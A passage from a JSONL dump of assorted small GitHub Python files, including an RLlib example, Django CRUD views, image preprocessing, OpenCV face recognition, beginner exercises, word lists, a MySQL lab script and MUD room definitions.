main()\n","repo_name":"niviruwijayaratne/pedestrian-intent-estimation","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"23188703124","text":"# https://docs.ray.io/en/latest/rllib/index.html\n# This is example from page: https://www.youtube.com/watch?v=HteW2lfwLXM\n# Ray RLlib: How to Use Deep RL Algorithms to Solve Reinforcement Learning Problems, Dibya Chakravorty\n\n\nimport ray\nfrom ray import tune\n\nif __name__ == \"__main__\":\n    ray.init()\n    analysis=tune.run(\"PPO\",\n              # https://docs.ray.io/en/latest/rllib/rllib-training.html#advanced-python-apis\n              config={\"env\":\"CartPole-v1\",\n                        #\"evaluation_interval\":2, # number of training iterations between evaluation\n                        \"framework\": \"tf2\",\n                        \"seed\": None,\n                        \"num_gpus\": 0,\n                        \"num_workers\": 4,\n                        \"evaluation_num_workers\": 0,\n                        \"gamma\": tune.grid_search([0.9, 0.95, 0.99]),\n                        #\"gamma\": 0.99,\n                        #\"lr\": tune.grid_search([0.01, 0.001, 0.0001]),\n                        #\"evaluation_num_episodes\": 100,\n                        #\"log_level\": \"WARN\" #\n                        # other configuration parameters\n              })\n\n\n\n\n\"\"\"\n# Import the RL algorithm (Algorithm) we would like to use.\nfrom ray.rllib.algorithms.ppo import PPO\n\n# Configure the algorithm.\nconfig = {\n    # Environment (RLlib understands openAI gym registered strings).\n    \"env\": \"CartPole-v1\",\n    # Use 2 environment workers (aka \"rollout workers\") that parallelly\n    # collect samples from their own environment clone(s).\n    \"num_workers\": 2,\n    # Change this to \"framework: torch\", if you are using PyTorch.\n    # Also, use \"framework: tf2\" for tf2.x eager execution.\n    \"framework\": \"tf\",\n    # Tweak the default model provided automatically by RLlib,\n    # given the environment's observation- and action spaces.\n    \"model\": {\n        \"fcnet_hiddens\": [64, 64],\n        \"fcnet_activation\": \"relu\",\n    },\n    # Set up a separate evaluation worker set for the\n    # `algo.evaluate()` call after training (see below).\n    \"evaluation_num_workers\": 1,\n    # Only for evaluation runs, render the env.\n    \"evaluation_config\": {\n        \"render_env\": True,\n    },\n}\n\n# Create our RLlib Trainer.\nalgo = PPO(config=config)\n\n# Run it for n training iterations. A training iteration includes\n# parallel sample collection by the environment workers as well as\n# loss calculation on the collected batch and a model update.\nfor _ in range(3):\n    print(algo.train())\n\n# Evaluate the trained Trainer (and render each timestep to the shell's\n# output).\nalgo.evaluate()\n\"\"\"","repo_name":"PeterPirog/rllib_examples","sub_path":"02_simple_rllib.py","file_name":"02_simple_rllib.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"19267624691","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\nfrom .models import *\n\n# Create your views here.\ndef index(request):\n    categories = Category.objects.all()\n    restaurants = Restaurant.objects.all()\n    content = {'categories': categories, 'restaurants': restaurants}\n    # return HttpResponse(\"index\")\n    return render(request, 'shareRes/index.html', content)\n    \ndef restaurantDetail(request,res_id):\n    restaurant = Restaurant.objects.get(id = res_id)\n    content = {'restaurant': restaurant}\n    # return HttpResponse(\"restaurantDetail\")\n    return render(request, 'shareRes/restaurantDetail.html', content)\n    \ndef restaurantCreate(request):\n    categories = Category.objects.all()\n    content = {'categories': categories}\n    # return HttpResponse(\"restaurantCreate\")\n    return render(request, 'shareRes/restaurantCreate.html', content)\n\ndef restaurantUpdate(request,res_id):\n    categories = Category.objects.all()\n    restaurant = Restaurant.objects.get(id = res_id)\n    content = {'categories': categories, 'restaurant': restaurant}\n    return render(request, 'shareRes/restaurantUpdate.html', content)\n\ndef Delete_restaurant(request):\n    res_id = request.POST['resId']\n    restaurant = Restaurant.objects.get(id = res_id)\n    restaurant.delete()\n    return HttpResponseRedirect(reverse('index'))\n\ndef 
Update_restaurant(request):\n resId = request.POST['resId']\n change_category_id = request.POST['resCategory']\n change_category = Category.objects.get(id = change_category_id)\n change_name = request.POST['resTitle']\n change_link = request.POST['resLink']\n change_content = request.POST['resContent']\n change_keyword = request.POST['resLoc']\n before_restaurant = Restaurant.objects.get(id = resId)\n before_restaurant.category = change_category\n before_restaurant.restaurant_name = change_name\n before_restaurant.restaurant_link = change_link\n before_restaurant.restaurant_content = change_content\n before_restaurant.restaurant_keyword = change_keyword\n before_restaurant.save()\n return HttpResponseRedirect(reverse('resDetailPage', kwargs={'res_id':resId}))\n\ndef Create_restaurant(request):\n category_id = request.POST['resCategory']\n category = Category.objects.get(id = category_id)\n name = request.POST['resTitle']\n link = request.POST['resLink']\n content = request.POST['resContent']\n keyword = request.POST['resLoc']\n new_res = Restaurant(category = category, restaurant_name = name, restaurant_link = link, restaurant_content = content, restaurant_keyword = keyword)\n new_res.save()\n return HttpResponseRedirect(reverse('index'))\n\ndef categoryCreate(request):\n categories = Category.objects.all()\n content = {'categories': categories}\n # return HttpResponse(\"categoryCreate\")\n return render(request, 'shareRes/categoryCreate.html', content)\n\ndef Create_category(request):\n category_name = request.POST['categoryName']\n new_category = Category(category_name = category_name)\n new_category.save()\n return HttpResponseRedirect(reverse('index'))\n # return HttpResponse(\"여기서 category Create 기능을 구현할거야.\")\n\ndef Delete_category(request):\n category_id = request.POST['categoryId']\n delete_category = Category.objects.get(id = category_id)\n delete_category.delete()\n return HttpResponseRedirect(reverse('cateCreatePage'))","repo_name":"doorBW/RestaurantShare-with-Django","sub_path":"RestaurantShare/shareRes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"31097136458","text":"import os\r\nimport numpy as np\r\nimport gc\r\nimport h5py\r\nfrom skimage import transform\r\nimport random\r\nfrom tqdm import tqdm\r\nimport nibabel as nib\r\nimport argparse\r\n\r\nfrom utils import *\r\n\r\ninput_path = '../dataset/Mydataset/train'\r\nsave_path= '../dataset/Mydataset/processed'\r\n#Refference:\r\ndimension = 3#3d\r\nBUFFER_SIZE = 5\r\nsubset_size = 40\r\ndtype = np.float32\r\ninp_exts = ['']\r\nmask_exts = ['_seg']\r\ntsize = (48, 48, 48)\r\nchannel = 1\r\n\r\ndef get_mode(idx):\r\n if idx%10>=8: #train/val =4/1\r\n return 'val'\r\n else:\r\n return 'train'\r\ndef process_test_data(input_path,save_path,channels,tsize):\r\n assert len(tsize) == dimension\r\n hdf5_file = h5py.File(save_path, \"w\")\r\n file_list = {'test':[]}\r\n folders = os.listdir(input_path)\r\n #random.shuffle(a)\r\n for _,fname in enumerate(folders):\r\n file_list['test'].append(fname)\r\n num = len(file_list['test'])\r\n print(f'Test Set Size:{num}')\r\n datasets = {}\r\n for mode in file_list:\r\n set_size = len(file_list[mode])\r\n if set_size>0:\r\n datasets[f'imgs_{mode}'] = hdf5_file.create_dataset(f'imgs_{mode}',(set_size,)+tuple(tsize)+(channels,),dtype=dtype)\r\n datasets[f'offset_{mode}'] = hdf5_file.create_dataset(f'offset_{mode}',(set_size,3),dtype=dtype)\r\n 
datasets[f'names_{mode}'] = hdf5_file.create_dataset(f'names_{mode}',(set_size,),dtype=h5py.special_dtype(vlen=str))\r\n img_list = {'test': []}\r\n offset_list = {'test': []}\r\n name_list = {'test': []}\r\n mH,mW,mD = 0,0,0 #max img size\r\n for mode in file_list:\r\n print(f'Start processing {mode} images')\r\n write_buffer = 0\r\n count = 0\r\n for fname in tqdm(file_list[mode]):\r\n path = os.path.join(input_path,fname)# \r\n img,_,img_header = load_niis(path,fname,inp_exts)\r\n assert img.shape[-1] == channels\r\n #Analyze\r\n img,offset = crop_alldim_3d(img)#crop zero volume\r\n w,h,d = img.shape[:3]\r\n mW,mH,mD = max(mW,w),max(mH,h),max(mD,d)\r\n\r\n \r\n \r\n pixel_size = (img_header.structarr['pixdim'][1],\r\n img_header.structarr['pixdim'][2],\r\n img_header.structarr['pixdim'][3])\r\n assert pixel_size == (1.0,1.0,1.0)\r\n \r\n\r\n img = crop_or_pad_slice_to_size(img, tsize, channels)\r\n img = normalise_image(img)\r\n\r\n img_list[mode].append(img)\r\n offset_list[mode].append(offset)\r\n name_list[mode].append(fname)\r\n\r\n write_buffer += 1\r\n\r\n if write_buffer >= BUFFER_SIZE:\r\n\r\n counter_to = count + write_buffer\r\n write_to_hdf5_test(datasets, mode, img_list, offset_list, name_list, count, counter_to)\r\n release_tmp_memory([img_list, offset_list,name_list], mode)\r\n\r\n # reset stuff for next iteration\r\n count = counter_to\r\n write_buffer = 0\r\n\r\n print('Writing remaining data')\r\n counter_to = count + write_buffer\r\n\r\n if len(file_list[mode]) > 0:\r\n write_to_hdf5_test(datasets, mode, img_list, offset_list, name_list,count,counter_to)\r\n release_tmp_memory([img_list, offset_list], mode)\r\n hdf5_file.close()\r\n print(mW,mH,mD)\r\ndef process_train_data(input_path,save_path,channels,tsize):\r\n assert len(tsize) == dimension\r\n hdf5_file = h5py.File(save_path, \"w\")\r\n file_list = {'train': [], 'val': []}\r\n folders = os.listdir(input_path)\r\n #random.shuffle(a)\r\n for idx,fname in enumerate(folders):\r\n mode = get_mode(idx)\r\n file_list[mode].append(fname)\r\n file_list['trainval'] = file_list['train'][:subset_size]\r\n\r\n train_num = len(file_list['train'])\r\n val_num = len(file_list['val'])\r\n print(f'Train Set Size:{train_num}',f'Val Set Size:{val_num}')\r\n datasets = {}\r\n for mode in file_list:\r\n set_size = len(file_list[mode])\r\n if set_size>0:\r\n datasets[f'imgs_{mode}'] = hdf5_file.create_dataset(f'imgs_{mode}',(set_size,)+tuple(tsize)+(channels,),dtype=dtype)\r\n datasets[f'masks_{mode}'] = hdf5_file.create_dataset(f'masks_{mode}',(set_size,)+tuple(tsize),dtype=np.uint8)\r\n datasets[f'names_{mode}'] = hdf5_file.create_dataset(f'names_{mode}',(set_size,),dtype=h5py.special_dtype(vlen=str))\r\n img_list = {'train': [], 'val': [],'trainval':[]}\r\n mask_list = {'train': [], 'val': [],'trainval':[]}\r\n name_list = {'train': [], 'val': [],'trainval':[]}\r\n mH,mW,mD = 0,0,0 #max img size\r\n for mode in file_list:\r\n print(f'Start processing {mode} images')\r\n write_buffer = 0\r\n count = 0\r\n for fname in tqdm(file_list[mode]):\r\n path = os.path.join(input_path,fname)# \r\n img,_,img_header = load_niis(path,fname,inp_exts)\r\n assert img.shape[-1] == channels\r\n mask,_,_ = load_niis(path,fname,mask_exts)\r\n mask = mask.squeeze()\r\n #Analyze\r\n img,mask,_ = crop_alldim_3d(img,mask.copy())#crop zero volume\r\n w,h,d = img.shape[:3]\r\n mW,mH,mD = max(mW,w),max(mH,h),max(mD,d)\r\n\r\n \r\n \r\n pixel_size = (img_header.structarr['pixdim'][1],\r\n img_header.structarr['pixdim'][2],\r\n 
img_header.structarr['pixdim'][3])\r\n assert pixel_size == (1.0,1.0,1.0)\r\n \r\n\r\n img = crop_or_pad_slice_to_size(img, tsize, channels)\r\n mask = crop_or_pad_slice_to_size(mask, tsize)\r\n\r\n img = normalise_image(img)\r\n\r\n img_list[mode].append(img)\r\n mask_list[mode].append(mask)\r\n name_list[mode].append(fname)\r\n\r\n write_buffer += 1\r\n\r\n if write_buffer >= BUFFER_SIZE:\r\n\r\n counter_to = count + write_buffer\r\n write_to_hdf5(datasets, mode, img_list, mask_list, name_list,count, counter_to)\r\n release_tmp_memory([img_list, mask_list,name_list], mode)\r\n\r\n # reset stuff for next iteration\r\n count = counter_to\r\n write_buffer = 0\r\n\r\n print('Writing remaining data')\r\n counter_to = count + write_buffer\r\n\r\n if len(file_list[mode]) > 0:\r\n write_to_hdf5(datasets, mode, img_list, mask_list, name_list,count,counter_to)\r\n release_tmp_memory([img_list, mask_list], mode)\r\n hdf5_file.close()\r\n print(mW,mH,mD)\r\n\r\n\r\n \r\ndef load_and_process_data(input_path,save_path,channels,val,\r\n tsize=None,overwrite=False):\r\n \r\n if not(os.path.exists(save_path)):\r\n os.mkdir(save_path)\r\n if not val:\r\n data_path = os.path.join(save_path,f'data_train.hdf5')\r\n if (not os.path.exists(data_path)) or overwrite:\r\n print(\"start to process\") \r\n process_train_data(input_path,data_path,channels,tsize)\r\n else:\r\n print('already exists')\r\n else:\r\n data_path = os.path.join(save_path,f'data_test.hdf5')\r\n if (not os.path.exists(data_path)) or overwrite:\r\n print(\"start to process test\" ) \r\n process_test_data(input_path,data_path,channels,tsize)\r\n else:\r\n print('already exists')\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--pr\", type=str, default='../../dataset/Mydataset', help=\"dataset path\")\r\n parser.add_argument(\"--train\", type=str, default='train', help=\"train path\")\r\n parser.add_argument(\"--test\", type=str, default='test', help=\"val path\")\r\n parser.add_argument(\"--save\", type=str, default='processed', help=\"save path\")\r\n parser.add_argument(\"--dim\", type=int, default=3, help=\"image dimension\")\r\n parser.add_argument(\"--channel\", type=int, default=1, help=\"image dimension\")\r\n parser.add_argument(\"--val\",action='store_true',help='trainset or not')\r\n parser.add_argument(\"--overwrite\",action='store_true',help='overwrite or not')\r\n parser.add_argument(\"--tsize\", type=tuple, default=None, help=\"target size\")\r\n args = parser.parse_args()\r\n dimension = args.dim\r\n save_path = os.path.join(args.pr,args.save)\r\n input_path = os.path.join(args.pr,args.train) if not args.val else os.path.join(args.pr,args.test)\r\n tsize = args.tsize if not args.tsize is None else tsize\r\n load_and_process_data(input_path,save_path,args.channel,args.val,tsize,args.overwrite)\r\n\r\n \r\n\r\n \r\n","repo_name":"Pamikk/rev-unet","sub_path":"data/process_hdf5.py","file_name":"process_hdf5.py","file_ext":"py","file_size_in_byte":8566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28899215463","text":"import cv2\nimport pickle\n\nface_classifier = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\nrecognizer_lbph = cv2.face.LBPHFaceRecognizer_create()\nrecognizer_lbph.read(\"trainner.yml\")\n\nlabels = {}\nwith open('labels/face-labels.pickle', 'rb') as file:\n org_labels = pickle.load(file)\n labels = {v: k for k, v in org_labels.items()}\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n retval, 
frame = cap.read()\n    # Face detection\n    gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n    cap_face = face_classifier.detectMultiScale(gray_frame, scaleFactor=1.3, minNeighbors=5)\n\n    for (x, y, w, h) in cap_face:\n        roi_gray = gray_frame[y:y + h, x:x + w]\n        cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\n\n        # Recognition based on trained model\n        id_, confidence = recognizer_lbph.predict(roi_gray)\n        confidence = int(100 * (1 - (confidence / 300)))\n        if confidence > 75:\n            name = labels[id_]\n            cv2.putText(frame, str(name) + ' ' + str(confidence) + '%', (x, y), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 0), 2)\n        else:\n            cv2.putText(frame, 'unknown', (x, y), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 255), 2)\n        cv2.imshow('frame', frame)\n    if cv2.waitKey(30) & 0xFF == ord('q'):\n        break\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"damianschmidt/face-recognition-LBPH","sub_path":"face_recognition.py","file_name":"face_recognition.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
+{"seq_id":"24572038309","text":"import math\n\n\nclass FeePolicy:\n    def __init__(self, base_fee, fee_rate, fee_spread, time_lock_delta):\n        self.base_fee = base_fee\n        self.fee_rate = fee_rate\n        self.fee_spread = fee_spread\n        self.time_lock_delta = time_lock_delta\n\n    def calculate(self, channel):\n        ratio = channel.local_balance / (channel.capacity - channel.commit_fee)\n        # -1.0 = all funds local\n        # +1.0 = all funds remote\n        ratio = 1.0 - 2.0 * ratio\n        coef = math.exp(self.fee_spread * ratio)\n        fee_rate = 0.000001 * coef * self.fee_rate\n        if fee_rate < 0.000001:\n            fee_rate = 0.000001\n        base_fee = self.base_fee\n        time_lock_delta = self.time_lock_delta\n        return base_fee, fee_rate, time_lock_delta\n","repo_name":"prusnak/suez","sub_path":"feepolicy.py","file_name":"feepolicy.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"77"}
+{"seq_id":"71444185849","text":"from simpletransformers.classification import ClassificationModel\nimport pandas as pd\nimport logging\n\n\nlogging.basicConfig(level=logging.INFO)\ntransformers_logger = logging.getLogger(\"transformers\")\ntransformers_logger.setLevel(logging.WARNING)\n\n# Train and Evaluation data needs to be in a Pandas Dataframe of two columns. 
The first column is the text with type str, and the second column is the label with type int.\ntrain_data = [['Example sentence belonging to class 1', 1], ['Example sentence belonging to class 0', 0]]\ntrain_df = pd.DataFrame(train_data)\n\neval_data = [['Example eval sentence belonging to class 1', 1], ['Example eval sentence belonging to class 0', 0]]\neval_df = pd.DataFrame(eval_data)\n\n# Create a ClassificationModel\nmodel = ClassificationModel('roberta', 'roberta-base',use_cuda = False) # You can set class weights by using the optional weight argument\n\n# Train the model\nmodel.train_model(train_df)\n\n# Evaluate the model\nresult, model_outputs, wrong_predictions = model.eval_model(eval_df)\n","repo_name":"behrica/test-simple-transformers-clj","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41217088498","text":"from PIL.JpegImagePlugin import JpegImageFile\nfrom PIL import ImageDraw\nfrom PIL import Image\nfrom typing import *\n\ndef display(images: List[JpegImageFile], labels: List[str], w: int = 300, h: int = 200, left_color: str = \"white\", right_color: str = \"white\"):\n \"\"\"Display a dual image\n\n Args:\n images (List[JpegImageFile]): A list containing two images\n labels (List[str]): The labels of the images\n w (int, optional): The width. Defaults to 300.\n h (int, optional): The height. Defaults to 200.\n left_color (str, optional): The color of left label. Defaults to \"white\".\n right_color (str, optional): The color of the right label. Defaults to \"white\".\n\n Returns:\n PIL.Image: A pillow image\n \"\"\"\n \n # define a grid\n grid = Image.new('RGB', size=(w, h))\n \n # draw the grid\n draw = ImageDraw.Draw(grid, mode='RGB')\n \n # define the second box\n box = (w // 2, 0)\n \n # define the size of the images\n size = (w // 2, h)\n \n # add images to the grid\n grid.paste(images[0].resize(size))\n \n grid.paste(images[1].resize(size), box = box)\n \n # draw labels\n draw.text((0, 0), labels[0], fill=left_color)\n \n draw.text(box, labels[1], fill=right_color)\n \n return grid\n","repo_name":"Oumar199/Real_Fake_Face_Detection_app","sub_path":"fake_face_detection/utils/display_pil.py","file_name":"display_pil.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2970006878","text":"a = 1\nb = \"abc\"\nc = [\"3\", 1, \"fdg\"]\nd = {\n \"name\": \"Deepak\",\n \"surname\": \"Waghmare\",\n \"age\": 10,\n \"skills\": [\"science\", \"maths\"]\n }\n\n \n\n\n###List Examples\nprint(type(c[0]))\nprint(int(c[0])+2)\nprint(c[0]+str(c[1]))\nprint(c[0]+c[2])\nprint(c[-1])\nc.append(\"qwer\")\nc[1] = \"7\"\nprint(c)\n\n \n\n### Dict Examples\n\n \n\nprint(d[\"name\"])\nprint(type(d[\"name\"]))\nd[\"age\"] = 27\nd[\"height\"] = \"1.80m\"\nprint(d)\nprint(d[\"skills\"][0])\n\n \n\noutput = {\n \"msg\": [\n {\n \"aliasesA\": [\n {\n \"members\": [\n \"21:00:00:24:FF:7D:CE:1E\"\n ],\n \"name\": \"finance-esx_port1\"\n }\n ],\n \"zonesA\": [\n {\n \"members\": [\n \"P3000T_A_P2\",\n \"P3000T_B_P0\",\n \"finance-esx_port1\"\n ],\n \"name\": \"finance-esx_port1_PowerStore\"\n }\n ]\n }\n ]\n}\n\n \n\nwwn = output[\"msg\"][0][\"aliasesA\"][0][\"members\"][0]\nprint(wwn.lower())\nprint(d[\"name\"].upper())\nf = \"asdf\"\ng = \"qwer\"\nif f == g:\n print(\"ok\")\nelse:\n print(\"different\")\n\n \n\n#exercise 1 - compare alias name with zone 
members. Do a for loop to iterate over zone members\nprint(\"exercise1\")\nalias = output[\"msg\"][0][\"aliasesA\"][0][\"name\"]\nprint(alias.lower())\n\nfor x in output[\"msg\"][0][\"zonesA\"][0][\"members\"]:\n if alias.lower() == x.lower():\n print(\"alias is already in the zone\")\n else:\n pass\n\n#exercise 2 - add more key-value to the output dictionary: size, model\nprint(\"exercise2\")\noutput[\"msg\"].append({\"size\": 1000, \"model\": \"P3000T\"})\noutput[\"size\"]=1000\noutput[\"model\"]=\"P3000T\"\n\nprint(output[\"size\"])\n\n#exercise 3 - add output-size to d-age\nprint(\"exercise3\")\n\n#print(output[\"msg\"][1][\"size\"]+d[\"age\"])\n\nprint(output[\"size\"]+d[\"age\"])\n\n#exercise 4 - concatenate zonesA-name in uppercase with d-surname in lowercase and hyphen in between\nprint(\"exercise4\")\n\nprint(output[\"msg\"][0][\"zonesA\"][0][\"name\"].upper() + \"-\" + d[\"surname\"].lower())\n\n","repo_name":"waghmaredb/python-projects","sub_path":"General Learning/Lesson 1.py","file_name":"Lesson 1.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19697873986","text":"word_list_en = [\n'rickshaw', \n'schnapps', \n'scratch', \n'shiv', \n'snazzy', \n'sphinx', \n'spritz', \n'squawk', \n'staff', \n'strength', \n'strengths', \n'stretch', \n'stronghold', \n'stymied', \n'subway', \n'swivel', \n'syndrome', \n'thriftless', \n'thumbscrew', \n'topaz', \n'transcript', \n'transgress', \n'transplant', \n'triphthong', \n'twelfth', \n'twelfths', \n'unknown', \n'unworthy', \n'unzip', \n'uptown', \n'vaporize', \n'vixen', \n'vodka', \n'voodoo', \n'vortex', \n'voyeurism', \n'walkway', \n'waltz', \n'wave', \n'wavy', \n'waxy', \n'wellspring', \n'wheezy', \n'whiskey', \n'whizzing', \n'whomever', \n'wimpy', \n'witchcraft', \n'wizard', \n'woozy', \n'wristwatch', \n'wyvern', \n'xylophone', \n'yachtsman', \n'yippee', \n'yoked', \n'youthful', \n'yummy', \n'zephyr', \n'zigzag', \n'zigzagging', \n'zilch', \n'zipper', \n'zodiac', \n'zombie', \n]\n\n\n\n\nword_list_ua = [\n'характер', \n'хаос', \n'прозорість', \n'шантаж', \n'філолог', \n'кетчуп', \n'відвага', \n'звичка', \n'надія', \n'свідок', \n'бізнес', \n'хамелеон', \n'правило', \n'розвідка', \n'фестиваль', \n'харизма', \n'інстинкт', \n'інвестор', \n'реклама', \n'амбіції', \n'сарказм', \n'стартап', \n'розвага', \n'світанок', \n'заліковка', \n'влада', \n'запізнення', \n'дежавю', \n'незнайомець', \n'інтернет', \n'затишок', \n'продюсер', \n'кентавр', \n'єнот', \n'осінь', \n'скрипіння', \n'темперамент', \n'підробка', \n'натхнення', \n'анекдот', \n'видавництво', \n'драма', \n'перекладач', \n'абревіатура', \n'звіт', \n'акція', \n'абонемент', \n'солярій', \n'тир', \n'пелікан', \n'вікторина', \n'бестселер', \n'поліглот', \n'мутант', \n'альбінос', \n'діаспора', \n'розгадка', \n'зрада', \n'кислота', \n'артерія', \n'система', \n'жестикуляція', \n'радіо', \n'пранк', \n'гном', \n'голод', \n'материк', \n'слово', \n'запчастина', \n'штатив', \n'оренда', \n'монархія', \n'підписник', \n'рейтинг', \n'оскар', \n'провокація', \n'газ', \n'суперздібність', \n'секта', \n'логіка', \n'корупція', \n]","repo_name":"Yulia-Didun/100-Days-of-Code","sub_path":"DAY 7 (Hangman Game)/hangman_words.py","file_name":"hangman_words.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1734850287","text":"__author__ = 'nishkarsh'\n\nimport operator\nimport sys\nimport MySQLdb as mdb\nfrom 
time import sleep\nimport time\nfrom sys import argv\nimport networkx as nx\n\ncon = mdb.connect('10.5.18.66', '12CS10034', 'btech12', '12CS10034')\ncur = con.cursor()\n\ndef findAnswer():\n sql = \"select * from 12CS10034_orderedSeparation\"\n cur.execute(sql)\n #get values from the table created in previous parts and then create a new table outputting the values.\n for y in cur.fetchall():\n if y[2] != -1:\n sql = \"INSERT INTO 12CS10034_canfind VALUES('\"+y[0]+\"','\"+y[1]+\"','YES')\"\n cur.execute(sql)\n else:\n sql = \"INSERT INTO 12CS10034_canfind VALUES('\"+y[0]+\"','\"+y[1]+\"','NO')\"\n cur.execute(sql)\n\n con.commit()\n\nif __name__ == \"__main__\":\n\n #sql = \"CREATE TABLE IF NOT EXISTS 12CS10034_canfind(pid1 VARCHAR(9),firstName VARCHAR(50),pid2 VARCHAR(9),secondName VARCHAR(50),answer varchar(6),constraint primary key(pid1,pid2))\"\n sql = \"CREATE TABLE IF NOT EXISTS 12CS10034_canfind(firstName VARCHAR(50),secondName VARCHAR(50),answer varchar(6))\" # again the problem of primary key persists. Its better to use above table.\n cur.execute(sql)\n findAnswer()\n","repo_name":"nishkarsh-shastri/DBMS_lab_assignments","sub_path":"assignment5/part_2b.py","file_name":"part_2b.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19215126579","text":"# coding=gbk\nfrom _objects import Room,Exit\n\nexits = [\n\tExit('west', 'guanwai/caoguduo', False),\n\tExit('north', 'guanwai/xiaoyuan', False),\n\tExit('east', 'guanwai/milin1', False),\n]\nbaihe=Room('guanwai/baihe', u'白河', 'guanwai', 0, exits)\n\nexits = [\n\tExit('eastdown', 'guanwai/tianchi1', False),\n\tExit('southwest', 'guanwai/yuzhu', False),\n\tExit('north', 'guanwai/luming', False),\n]\nbaiyun=Room('guanwai/baiyun', u'白云峰', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/xiaoxiang', False),\n\tExit('south', 'guanwai/jishi', False),\n]\nbeicheng=Room('guanwai/beicheng', u'北城', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/chuanchang', False),\n\tExit('east', 'guanwai/damenkan', False),\n]\nbingmian=Room('guanwai/bingmian', u'冰面', 'guanwai', 0, exits)\n\nexits = [\n\tExit('northwest', 'guanwai/mantianxing', False),\n\tExit('east', 'guanwai/baihe', False),\n]\ncaoguduo=Room('guanwai/caoguduo', u'谷草垛', 'guanwai', 0, exits)\n\nexits = [\n\tExit('south', 'guanwai/xuedi3', False),\n\tExit('east', 'guanwai/bingmian', False),\n]\nchuanchang=Room('guanwai/chuanchang', u'船厂', 'guanwai', 0, exits)\n\nexits = [\n\tExit('east', 'guanwai/shizilu', False),\n]\nchufang=Room('guanwai/chufang', u'厨房', None, 0, exits)\n\nexits = [\n\tExit('northwest', 'guanwai/pubu', False),\n\tExit('southwest', 'guanwai/longmen', False),\n]\ndamen=Room('guanwai/damen', u'达门', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/bingmian', False),\n\tExit('southeast', 'guanwai/ermenkan', False),\n]\ndamenkan=Room('guanwai/damenkan', u'大门坎子', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/jishi', False),\n\tExit('south', 'guanwai/tuyaoguan', False),\n\tExit('northeast', 'guanwai/huandi1', False),\n\tExit('east', 'guanwai/xuedi1', False),\n]\ndongcheng=Room('guanwai/dongcheng', u'东城', 'guanwai', 0, exits)\n\nexits = [\n\tExit('northwest', 'guanwai/damenkan', False),\n\tExit('east', 'guanwai/mantianxing', False),\n]\nermenkan=Room('guanwai/ermenkan', u'二门坎子', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/famu1', False),\n\tExit('southup', 'guanwai/luming', False),\n]\nfamu=Room('guanwai/famu', u'伐木场', 
'guanwai', 0, exits)\n\nexits = [\n\tExit('east', 'guanwai/famu', False),\n]\nfamu1=Room('guanwai/famu1', u'伐木场', 'guanwai', 0, exits)\n\nexits = [\n\tExit('westdown', 'guanwai/milin3', False),\n\tExit('east', 'guanwai/xiaotianchi', False),\n]\nheifengkou=Room('guanwai/heifengkou', u'黑风口', None, 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/jingxiu', False),\n\tExit('south', 'guanwai/xiaowu', False),\n\tExit('east', 'guanwai/liangong', False),\n\tExit('north', 'guanwai/shizilu', False),\n]\nhouyuan=Room('guanwai/houyuan', u'后院', None, 0, exits)\n\nexits = [\n\tExit('westdown', 'guanwai/tianchi1', False),\n\tExit('north', 'guanwai/tianhuo', False),\n]\nhuagai=Room('guanwai/huagai', u'华盖峰', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southwest', 'guanwai/dongcheng', False),\n\tExit('northeast', 'guanwai/huandi2', False),\n]\nhuandi1=Room('guanwai/huandi1', u'荒路', 'guanwai', 0, exits)\n\nexits = [\n\tExit('southwest', 'guanwai/huandi1', False),\n\tExit('enter', 'guanwai/shanshenmiao', False),\n]\nhuandi2=Room('guanwai/huandi2', u'荒路', 'guanwai', 0, exits)\n\nexits = [\n\tExit('east', 'guanwai/houyuan', False),\n]\njingxiu=Room('guanwai/jingxiu', u'静修室', None, 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/kedian', False),\n\tExit('south', 'guanwai/nancheng', False),\n\tExit('east', 'guanwai/dongcheng', False),\n\tExit('north', 'guanwai/beicheng', False),\n]\njishi=Room('guanwai/jishi', u'集市', 'guanwai', 0, exits)\n\nexits = [\n\tExit('west', 'guanwai/majiu', 